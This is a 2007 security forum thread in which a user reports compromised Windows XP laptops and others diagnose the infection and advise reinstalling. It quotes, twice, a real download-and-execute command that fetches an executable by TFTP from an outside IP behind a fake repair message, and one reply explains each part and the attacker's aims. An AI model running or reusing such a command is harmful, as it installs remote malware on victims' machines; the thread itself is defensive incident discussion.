-
June 26th, 2007, 06:59 PM
#1
Compromised Windows XP machine
In my company, some people take laptops out in the field, aka the real world..
Many have reported, and I have seen myself, lots of emails being sent after something like this shows up in the start>run window ..
%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?
-
June 26th, 2007, 08:06 PM
#2
Short answer is, yes you are compromised. It's seems to have something to do with VNC.
More Info is here:
http://forums.speedguide.net/showthread.php?t=219431
Cheers:
-
June 26th, 2007, 09:42 PM
#3
-
June 27th, 2007, 08:41 AM
#4
Originally Posted by Trevoke
I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?
Turning on the XP firewall won't do it. It doesn't block outgoing traffic. Those machines are compromised alright. Better be safe then sorry and reinstall. Don't forget all the service packs and patches too.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
June 27th, 2007, 09:52 AM
#5
The first download called, will open windows firewall to download the second exe, which if your AV defs are upto date, should catch the payload.
What happens if a big asteroid hits the Earth? Judging from realistic simulations involving a sledge hammer and a common laboratory frog, we can assume it will be pretty bad. - Dave Barry
-
June 27th, 2007, 01:57 PM
#6
Try an online scan via www.pandasoftware.com or housecall.trendmicro.com
Never hurts to get a second opinion.
“Everybody is ignorant, only on different subjects.” — Will Rogers
-
June 27th, 2007, 02:52 PM
#7
Trevoke, I won't waist your time with what I think as I agree with the answers here, however, knowing what OS you like to use, I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.
Could be a fun little project for you. I used to do something similar at my college: I would set up my laptop on the network, open up iptraf, watch, then open up wireshark if I wanted a GUI, and kind of watch what was going on.
It's amazing what an expensive firewall used by a college will let in heh.
-
June 27th, 2007, 05:26 PM
#8
A fair idea, gore. I like it. Thanks.
-
June 28th, 2007, 08:32 AM
#9
No problem. And hey if you track them down you might be able to prevent more
-
June 28th, 2007, 09:23 AM
#10
%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.
Good job they didn't include their IP address in the exploit command as it would be too easy to track them down then....you would have to sniff the network traffic to work it out......
Check your eventvwr and you will see the IP address that they connected from, which will more than likely be the same one that you see in the command they issued.
A break down of the command is:
%comspec% is a variable which points to
the command prompt exe.
The /c switch tells the command shell to carry out the command passed to it and then terminate.
echo, will obviously display what ever follows the command onto the screen - this is just to make the user think something is happening to Windows and can be anything that you want it to be.
Now the host will connect via TFTP to 75.132.3.206, the -i switch tells it to GET (download) the file in octet format, which is the method used to receive exe files
Then the newly downloaded file is launched
It is a very common exploit and is mistakenly believed to relate to VNC - whilst VNC is the easiest way to connect to a remote host to issue the command, it is not directly at fault and really does not have much to do with the way to command works and the end result of issuing it.
Normally the first goal would be to see if the Windows firewall is on and if it is, to add a few exceptions to it to enable to attacker to connect to you on what ever port the newly downloaded application will listen on. If you are not logged in as a local admin then this is negated and the attack will fail. If you are logged in as a local admin then it's time to learn a lesson, as the attacker will probably have spawned a shell with local admin rights and you are pretty much guaranteed of not getting rid of him (if he is any good).
Either way, if someone has ran that command then you will now have an application running on your machine that you don't really want.... I would personally go through all the necessary stuff to locate and remove it.
Last edited by Nokia; June 28th, 2007 at 09:33 AM.
Similar Threads
-
By gore in forum Operating Systems
Replies: 2
Last Post: February 25th, 2005, 08:12 AM
-
By mohaughn in forum Microsoft Security Discussions
Replies: 2
Last Post: October 13th, 2004, 04:31 AM
-
By rajunpl in forum Operating Systems
Replies: 43
Last Post: July 1st, 2004, 07:30 AM
-
By Cybr1d in forum Miscellaneous Security Discussions
Replies: 11
Last Post: June 10th, 2004, 12:09 AM
-
By warl0ck7 in forum Microsoft Security Discussions
Replies: 7
Last Post: August 14th, 2003, 12:23 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|